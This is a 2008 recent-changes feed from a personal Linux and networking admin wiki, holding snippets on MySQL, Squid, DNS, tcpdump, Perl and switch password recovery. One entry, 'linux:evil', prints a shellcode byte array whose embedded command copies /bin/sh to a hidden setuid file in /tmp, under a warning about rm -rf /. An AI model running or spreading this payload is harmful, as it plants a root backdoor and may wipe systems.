tnt.aufbix.org

windows:sidebar - + Microsoft Security Assessment Tool

Andraz — Fri, 21 Nov 2008 18:42:19 +0100

* General page * Windows Commandline * Microsoft Security Assessment Tool

mysql:scripts

Andraz — Fri, 21 Nov 2008 18:01:04 +0100

Kill every MySQL SELECT older than X seconds #!/bin/bash SEC=$1 IFS=’|’ if [[ $SEC -lt 1 ]]; then echo “Usage: $0 SECONDS” exit 1 fi mysqladmin proc -v|grep Query|grep -Evi “delete|update|insert|alter table” |while read dummy qid qusr qhost qdb qstat qsec qstat2 query do if [ $qsec -gt $SEC ]; then echo “Killing query $qid…” mysqladmin kill $qid fi done

linux:squid

Andraz — Fri, 21 Nov 2008 17:57:03 +0100

* Viralator ( - Squid + Perl skript) * squid-vscan () * HAVP + Squid () How can I configure squid so that it never caches some web sites? Add the following line in /etc/squid/squid.conf:

networking - + ike-scan

Andraz — Fri, 21 Nov 2008 17:43:41 +0100

Networking links else where * TCP Tuning guide * Speed guides and tools * Beginner's Guide to Wireless Auditing * Clownix - Clownix: GNU/Linux Real Time Graphical Monitoring Tool, Uml_clownix: GNU/Linux Virtual Network ---------- * Public IPv6 2 IPv4 relay routers * Non-BGP Multihoming for Web Hosts

linux:evil - some evil l00nix code

Andraz — Fri, 21 Nov 2008 17:23:12 +0100

YOU HAVE BEEN WARNED!DO understand rm -rf / char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/…

linux:sidebar

Andraz — Fri, 21 Nov 2008 17:17:59 +0100

* Linux section * Bind - DNS * kannel * Linux flavors * Debian GNU/Linux * Ubuntu tips * minimization of RH-based Linux * CentOS tips * Redhat ( RHEL ) tips * Linux networking * Linux routing tips * Linux firewalling * Linux load balancing * L7 filtering cookbook

dns

Greebo Ogg — Fri, 21 Nov 2008 15:44:04 +0100

DNS Terminology * Zone - The domain namespace is divided into regions called zones. For instance, if you have example.com, you have the example section, or zone, of the com domain. * DNS server - The DNS server is a server that maintains the name and IP information for a domain. You can have a primary DNS server for master zone, a secondary server for slave zone, or a slave server without any zones for caching.

vim - created

Greebo Ogg — Thu, 20 Nov 2008 11:42:10 +0100

Vim listchars VIM

software

Greebo Ogg — Thu, 20 Nov 2008 11:41:22 +0100

* PHP * Mediawiki Tips * backup * Setting MySQL server * MySQL circular replication automated handling * python * Lotus Domino (linux) * Lotus Domino r5 (linux) * Xchat irc odjemalec * VNC * dovecot * mplayer * firefox * wget * nginx * vsftp * Hosting ControlPanels (linux) * Mono on linux(.net) * Nexenta GnuSolaris * dos utils * OpenOffice.Org * vim

linux:perc - + How To Manage Dell Servers using OMSA - OpenManage Server Administrator On Linux

Andraz — Tue, 18 Nov 2008 15:53:58 +0100

useful links: * On Dell's PERC 5/ * * How To Manage Dell Servers using OMSA - OpenManage Server Administrator On Linux Dell PERC 6/i and RAID monitoring A few pointers for people trying to get Dell's PERC 6/i RAID monitoring working under Ubuntu, and any other linux for that matter. It also applies to PERC 5/i too, and... other stuff :-)

bash - created

Andraz — Mon, 17 Nov 2008 21:27:59 +0100

If you just want to find out what's new in a directory: lsnew() { ls -lt ${1+“$@”} | head -20; }

misc

Andraz — Mon, 17 Nov 2008 21:27:48 +0100

* MogileFS distributed filesystem * tmpfs * PostgreSQL * Xen * threelinestip * Forcing linux to panic * iscsi * bash Some simple usage: all packets arriving at or departing from 192.168.0.2 # tcpdump -n host 192.168.0.2 To print traffic between 192.168.0.2 and either 10.0.0.4 or 10.0.0.5: # tcpdump -n host 192.168.0.2 and $ 10.0.0.4 or 10.0.0.5 $

perl - + An interactive perl shell

Andraz — Mon, 17 Nov 2008 20:34:10 +0100

An interactive perl shell #!perl use strict; no strict 'vars'; no strict 'refs'; use warnings; use Data::Dumper; $Data::Dumper::Indent--; $| = 1; # an alias for exit() sub quit { exit; } my ($ver,$maj,$min) = ($] =~ /(\d+)\.(\d{3})(\d{3})/); $maj += 0; $min += 0; print +(split '/', $^X)[-1], " $ver.$maj.$min\n"; $, = ','; $THE_PROMPT = '% '; print $THE_PROMPT; while (<>) { print eval; print +($@ || "\n") . $THE_PROMPT };

linux:tips

Andraz — Mon, 17 Nov 2008 20:30:02 +0100

suid, sgid, sticky bit, permissions * 4000 (chmod u+s) is suid; for files execute as owning user (often root). * 2000 (chmod g+s) is sgid; for files execute as owning group (often root); for directories the group on newly created files will be set to the directory’s group rather than the creator’s group. Typically used for shared directories. * suid and sgid are ignored on scripts, due to the security risk * 1000 (chmod +t) is sticky bit (”save text image”); for files it used…

iscsi - iscsi

Andraz — Mon, 17 Nov 2008 00:38:21 +0100

This time we are going to use th backports repository and the Etcn’n'half kernel, cause they provide a better and far more stable support for iSCSI under Debian (Etch). So, first of all add the backports repository: echo “deb http://www.backports.org/debian etch-backports main contrib non-free” >> /etc/apt/sources.list and do some basic stuff:

security

Andraz — Mon, 17 Nov 2008 00:35:37 +0100

New articles in this section: article description Linux GrSecurity Patching kernel with Grsec kernel security patch Linux firewalling the title should be a good description for more see sidebar on your left or leave a comment ---------- * Five common Web application vulnerabilities * A free "on-the-fly" transparent disk encryption program for MS Windows 2000/Windows XP * Rootkit Hunter * Hardened-PHP Project Homepage * Linux securiy tips * OSSEC HIDS - Open Source HIDS * …

cisco:pastebin

Andraz — Thu, 06 Nov 2008 15:19:58 +0100

R1# show control-plane host open-ports Active internet connections (servers and established) Prot Local Address Foreign Address Service State tcp *:23 *:0 Telnet LISTEN tcp *:80 *:0 HTTP CORE LISTEN tcp *:179 *:0 BGP LISTEN tcp *:179 10.0.7.2:43962 BGP ESTABLIS tcp *:23 10.0.7.2:18036 Telnet ESTABLIS udp …

extreme

Andraz — Thu, 06 Nov 2008 13:40:05 +0100

Password Recovery procedure * reboot & press spacebar * The option you want to choose is to select the primary code image by hitting 1 * After the primary image is selected select k to erase selected configuration * Choose d to force default configuration and then f to boot on board flash. * After your Extreme switch resets and you are prompted with a login enter in admin, hit enter twice entering a blank password at the password prompt.

raid1_on_windows_xp

Greebo Ogg — Sat, 01 Nov 2008 09:59:27 +0100

make temporary folder expand dmadmin.ex_ expand dmconfig.dl_ expand dmboot.sy_ or copy from C:\windows\system32 to temporary folder

mysql:sidebar

Andraz — Fri, 31 Oct 2008 23:30:10 +0100

* MySQL * Useful scripts * Replication * MySQL tunning * MySQL Error Codes * MySQL backup * How To Set Up A Load-Balanced MySQL Cluster With MySQL 5.1 * Sundry MySQL Scripts and Docs * Mysqltuner * Converting 4.0 Character Columns to 4.1 Format * MySQL Forge Wiki * Zmanda Open Source backup * Zmanda Wiki